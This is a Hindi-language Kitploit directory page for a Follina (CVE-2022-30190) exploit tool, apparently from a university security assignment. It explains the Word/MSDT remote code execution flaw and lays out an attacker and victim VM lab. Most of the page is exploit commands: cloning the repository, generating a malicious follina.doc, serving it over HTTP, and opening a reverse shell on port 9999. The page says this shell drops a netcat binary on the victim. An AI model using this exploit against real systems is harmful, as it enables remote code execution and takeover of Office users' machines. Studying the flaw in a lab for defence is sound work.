Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30190 — Follina (CVE-2022-30190) एक Microsoft Office ज़ीरो-डे भेद्यता है जिसे हाल ही में खोजा गया है। यह एक उच्च-गंभीरता वाली भेद्यता है जिसका हैकर्स रिमोट कोड निष्पादन (RCE) हमलों के लिए उपयोग कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/aminetitrofine/cve-2022-30190
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubaminetitrofine/cve-2022-30190

CVE-2022-30190

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

Follina (CVE-2022-30190) एक Microsoft Office ज़ीरो-डे भेद्यता है जिसे हाल ही में खोजा गया है। यह एक उच्च-गंभीरता वाली भेद्यता है जिसका हैकर्स रिमोट कोड निष्पादन (RCE) हमलों के लिए उपयोग कर सकते हैं।

रिपॉजिटरी देखें
12613 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE 30190

अमीन टिट्रोफिन | 17 दिसंबर 2022


Follina (CVE-2022-30190) हाल ही में खोजी गई एक Microsoft Office जीरो-डे भेद्यता है। यह एक उच्च-गंभीरता वाली भेद्यता है जिसका उपयोग हैकर्स रिमोट कोड निष्पादन (RCE) हमलों के लिए कर सकते हैं। यह तब मौजूद होती है जब किसी कॉलिंग एप्लिकेशन जैसे कि Word से URL प्रोटोकॉल का उपयोग करके MSDT को कॉल किया जाता है। इस भेद्यता का सफलतापूर्वक शोषण करने वाला हमलावर कॉलिंग एप्लिकेशन के विशेषाधिकारों के साथ मनमाना कोड चला सकता है। इसके बाद हमलावर प्रोग्राम इंस्टॉल कर सकता है, डेटा देख, बदल या हटा सकता है, या उपयोगकर्ता के अधिकारों द्वारा अनुमत संदर्भ में नए खाते बना सकता है।

वातावरण

2 VMs:

  • हमलावर मशीन
    • kali-linux-2022.3-virtualbox-amd64 ( डाउनलोड करने का लिंक )
  • पीड़ित मशीन
    • Windows 10 (64 बिट) ( डाउनलोड करने का लिंक )
    • Microsoft Office 2016 Pro ( डाउनलोड करने का लिंक )

एक्सप्लॉइट

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

follina.py प्रोग्राम चलाने के बाद एक ( follina.doc ) दिखाई देगा, जिसमें एक दुर्भावनापूर्ण स्क्रिप्ट होती है।

दो VMs के बीच फ़ाइलें साझा करना आसान बनाने के लिए, हम Python http Server का उपयोग करेंगे

root@kitploit:~
$ python3 –m http.server 8080

उदाहरण

पोर्ट 9999 पर रिवर्स शेल प्राप्त करें। नोट, यह पीड़ित मशीन पर एक netcat बाइनरी डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। यदि एंटीवायरस अक्षम नहीं है तो यह एंटीवायरस डिटेक्शन को ट्रिगर करेगा।

root@kitploit:~
$ python3 follina.py -r 9999

calc.exe पॉप करें:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

notepad.exe पॉप करें:

root@kitploit:~
$ python3 follina.py -c "notepad"
टूल डाउनलोड करें